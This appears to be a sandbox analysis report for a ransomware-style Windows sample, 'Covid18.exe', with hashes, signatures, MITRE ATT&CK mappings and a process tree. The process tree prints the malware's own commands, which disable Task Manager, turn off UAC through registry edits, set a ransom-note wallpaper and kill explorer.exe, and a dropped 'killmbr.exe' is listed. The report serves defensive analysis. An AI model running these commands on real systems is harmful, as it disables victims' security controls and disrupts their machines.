70971148ed1fadb17a1de707b03b0b61bcf9d523c540b9bf4e411b5bb0dda5f0

Analysis

max time kernel
1790s
max time network
1566s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
06-03-2024 18:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Covid18.exe
Size

1.1MB
MD5

3350a84a3ab955c4138829a12c611aac
SHA1

5f74b27351f0f771ea65f6e51e5d974406f22e7a
SHA256

fa185e316b5797e7135f56d15caa81c64449fe05f4580f14d7d4651271d1577e
SHA512

e13da1b9f13a0b083007e9423c2408011b618d9cf3b6c78141caf121074ac90341e1b1c18288a5de14dfee4b8829e5dab504da8a0a4a2eff1b35460b3ccd99a3
SSDEEP

24576:bttVypSRczM0Z3h0iRdJKGthQ1/wmtFdmx7CAvU9zrRG:btTLI93Rd7A1w8Fdi75V

Score

10^/10

evasion ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/memory/2756-0-0x0000000000400000-0x0000000000636000-memory.dmp	upx
behavioral3/memory/2756-20-0x0000000000400000-0x0000000000636000-memory.dmp	upx

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp"	reg.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1124	taskkill.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
2492	reg.exe
1944	reg.exe
1520	reg.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1124	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2756 wrote to memory of 2968	2756	Covid18.exe	29
PID 2756 wrote to memory of 2968	2756	Covid18.exe	29
PID 2756 wrote to memory of 2968	2756	Covid18.exe	29
PID 2756 wrote to memory of 2968	2756	Covid18.exe	29
PID 2968 wrote to memory of 2492	2968	cmd.exe	30
PID 2968 wrote to memory of 2492	2968	cmd.exe	30
PID 2968 wrote to memory of 2492	2968	cmd.exe	30
PID 2968 wrote to memory of 2492	2968	cmd.exe	30
PID 2968 wrote to memory of 2560	2968	cmd.exe	31
PID 2968 wrote to memory of 2560	2968	cmd.exe	31
PID 2968 wrote to memory of 2560	2968	cmd.exe	31
PID 2968 wrote to memory of 2560	2968	cmd.exe	31
PID 2968 wrote to memory of 2576	2968	cmd.exe	32
PID 2968 wrote to memory of 2576	2968	cmd.exe	32
PID 2968 wrote to memory of 2576	2968	cmd.exe	32
PID 2968 wrote to memory of 2576	2968	cmd.exe	32
PID 2968 wrote to memory of 2576	2968	cmd.exe	32
PID 2968 wrote to memory of 2576	2968	cmd.exe	32
PID 2968 wrote to memory of 2576	2968	cmd.exe	32
PID 2968 wrote to memory of 2520	2968	cmd.exe	33
PID 2968 wrote to memory of 2520	2968	cmd.exe	33
PID 2968 wrote to memory of 2520	2968	cmd.exe	33
PID 2968 wrote to memory of 2520	2968	cmd.exe	33
PID 2968 wrote to memory of 2520	2968	cmd.exe	33
PID 2968 wrote to memory of 2520	2968	cmd.exe	33
PID 2968 wrote to memory of 2520	2968	cmd.exe	33
PID 2968 wrote to memory of 2608	2968	cmd.exe	34
PID 2968 wrote to memory of 2608	2968	cmd.exe	34
PID 2968 wrote to memory of 2608	2968	cmd.exe	34
PID 2968 wrote to memory of 2608	2968	cmd.exe	34
PID 2968 wrote to memory of 2608	2968	cmd.exe	34
PID 2968 wrote to memory of 2608	2968	cmd.exe	34
PID 2968 wrote to memory of 2608	2968	cmd.exe	34
PID 2968 wrote to memory of 2620	2968	cmd.exe	35
PID 2968 wrote to memory of 2620	2968	cmd.exe	35
PID 2968 wrote to memory of 2620	2968	cmd.exe	35
PID 2968 wrote to memory of 2620	2968	cmd.exe	35
PID 2968 wrote to memory of 2620	2968	cmd.exe	35
PID 2968 wrote to memory of 2620	2968	cmd.exe	35
PID 2968 wrote to memory of 2620	2968	cmd.exe	35
PID 2968 wrote to memory of 2616	2968	cmd.exe	36
PID 2968 wrote to memory of 2616	2968	cmd.exe	36
PID 2968 wrote to memory of 2616	2968	cmd.exe	36
PID 2968 wrote to memory of 2616	2968	cmd.exe	36
PID 2968 wrote to memory of 2616	2968	cmd.exe	36
PID 2968 wrote to memory of 2616	2968	cmd.exe	36
PID 2968 wrote to memory of 2616	2968	cmd.exe	36
PID 2968 wrote to memory of 2496	2968	cmd.exe	37
PID 2968 wrote to memory of 2496	2968	cmd.exe	37
PID 2968 wrote to memory of 2496	2968	cmd.exe	37
PID 2968 wrote to memory of 2496	2968	cmd.exe	37
PID 2968 wrote to memory of 2496	2968	cmd.exe	37
PID 2968 wrote to memory of 2496	2968	cmd.exe	37
PID 2968 wrote to memory of 2496	2968	cmd.exe	37
PID 2968 wrote to memory of 2544	2968	cmd.exe	38
PID 2968 wrote to memory of 2544	2968	cmd.exe	38
PID 2968 wrote to memory of 2544	2968	cmd.exe	38
PID 2968 wrote to memory of 2544	2968	cmd.exe	38
PID 2968 wrote to memory of 2544	2968	cmd.exe	38
PID 2968 wrote to memory of 2544	2968	cmd.exe	38
PID 2968 wrote to memory of 2544	2968	cmd.exe	38
PID 2968 wrote to memory of 2964	2968	cmd.exe	39
PID 2968 wrote to memory of 2964	2968	cmd.exe	39
PID 2968 wrote to memory of 2964	2968	cmd.exe	39

C:\Users\Admin\AppData\Local\Temp\Covid18.exe
"C:\Users\Admin\AppData\Local\Temp\Covid18.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2756
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5DE8.tmp\covid18.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2492
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2560
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2608
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2620
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2616
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2544
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2392
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2388
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2412
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2476
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2892
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:1944
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:1520
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1124

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5DE8.tmp\covid18.bat

Filesize
6KB

MD5
4d3900ef27a03c430d067ee4a0e79905

SHA1
85517ca18dc0335824655b1080bc029bc268778f

SHA256
425df1b6b4609df15ea636d7d24b5385a1fac0b822f85a240d358c8f65ac8443

SHA512
95a62d3894601396aacba53123a9b82187d2ba5867eac33f8b974973775da579d2654117aee33c162ff211c6be838a5967753a41d58bf52b7cfc497de9943f0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\5DE8.tmp\killmbr.exe

Filesize
101KB

MD5
bd8aa7b54d59e2500c3481a489476333

SHA1
fa2fcd68c472da4111b489e99a9c9f38c1067bf1

SHA256
9c40558cda6883ecc0944e767ec23749698d7dfcb191731b30323dd739de1dbf

SHA512
f4363beaa6006d4d9f3f09813dd6edc8056a497e05600465db3d59798471c30fbb80442053c5154ab49729b82687af14806b15e338af0414c25ddcedd0e2bca0

Download Submit
C:\Users\Admin\AppData\Local\Temp\5DE8.tmp\note.bmp

Filesize
2.0MB

MD5
ec128b2a2097b849334e7afea60937d3

SHA1
29d08e38164ef7f910e286a5389a259540547e4a

SHA256
2cc4607d03a26f9332949806c456b5aa0abf2dc6ef116b2f665fd679e587275c

SHA512
ec7a590aed6f5b9cb8f08e306edbd9a430cfc586366e188835ea5ff394e7b22050520b76e95821dee55d332e6c5df4a4bc28ceb13a2a04d397c55f516268766b

Download Submit
memory/2756-0-0x0000000000400000-0x0000000000636000-memory.dmp

Filesize
2.2MB

Download
memory/2756-20-0x0000000000400000-0x0000000000636000-memory.dmp

Filesize
2.2MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads